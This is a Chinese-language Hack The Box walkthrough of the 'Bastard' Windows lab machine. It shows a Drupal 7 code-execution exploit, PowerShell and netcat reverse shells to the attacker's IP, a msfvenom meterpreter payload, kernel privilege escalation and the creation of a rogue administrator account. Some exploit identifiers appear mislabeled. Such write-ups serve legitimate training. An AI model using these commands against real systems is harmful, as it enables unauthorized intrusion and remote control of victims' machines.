前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Hack The Box-Bastard

Hack The Box-Bastard

作者头像
鸿鹄实验室
发布2022-11-02 16:55:41
4330
发布2022-11-02 16:55:41
举报
文章被收录于专栏:鸿鹄实验室

发布时间

2017年

系统

Windows

难度

中等


端口扫描

nmap -sV -sC -sS -n -p- -Pn 10.10.10.9

代码语言:javascript
复制
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

靶机开放了80(HTTP)、135(RPC)、49154(RPC)端口

80端口是一个drupal 7

nmap还扫描出了36个目录其中CHANGELOG.txt存在drupal的版本信息,版本为7.54

访问80端口

搜索drupal 7的漏洞,发现CVE-2017-7600远程代码执行漏洞

漏洞详细原理参考:https://blog.csdn.net/whatday/article/details/107387212

使用脚本直接打即可,可以进行命令执行

使用nishang的Invoke-PowerShellTcp.ps1进行反弹shell,修改一下脚本的反弹shell的ip和端口

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.8 -Port 4444

攻击机在Invoke-PowerShellTcp.ps1目录下使用python开启一个暂时的web服务

使用exp去执行powershell命令,直接下载并执行Invoke-PowerShellTcp.ps1脚本,攻击机监听4444端口f

代码语言:javascript
复制
powershell -c iex (new-object system.net.webclient).downloadstring("http://10.10.14.13:8800/Invoke-PowerShellTcp.ps1")

发现行不通,不能反弹shell

换一种,使用smb服务,使用nc进行反弹shell

创建一个smb目录,将nc.exe放到smb目录

然后使用smbserver.py开启服务

python3 /root/桌面/impacket-master/build/scripts-3.9/smbserver.py share smb

命令执行:\\10.10.14.13\share\nc.exe -e cmd.exe 10.10.14.13 1234

获得shell

在C:\Users\dimitris\Desktop目录下获得user.txt

准备木马,上传到靶机并运行,上线msf

msf生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.13 LPORT=3333 -f exe -o shell.exe

将shell.exe放在临时web目录下,使用powershell下载到靶机中

代码语言:javascript
复制
powershell -c (new-object system.net.webclient).downloadfile('http://10.10.14.13:8800/shell.exe','C:\inetpub\drupal-7.54\shell.exe')

msf开启监听端口,运行shell.exe获得meterpreter

可以使用ms18_8120进行提权

部分版本Windows系统win32k.sys组件的NtUserSetImeInfoEx()系统服务函数内部未验证内核对象中的空指针对象,普通应用程序可利用该空指针漏洞以内核权限执行任意代码

msf:模块exploit/windows/local/ms18_8120_win32k_privesc

获得system权限

获得root.txt

在meterpreter使用run getgui -e开启靶机3389

新建用户,并将用户添加到administrators组中,然后激活

使用redesktop远程桌面登录即可


也可以使用15—051进行提权

上传ms15-015x64.exe

直接使用其执行命令,

msf继续监听端口,使用ms15-015x64.exe运行shell.exe获得system权限

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-06-20,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 鸿鹄实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档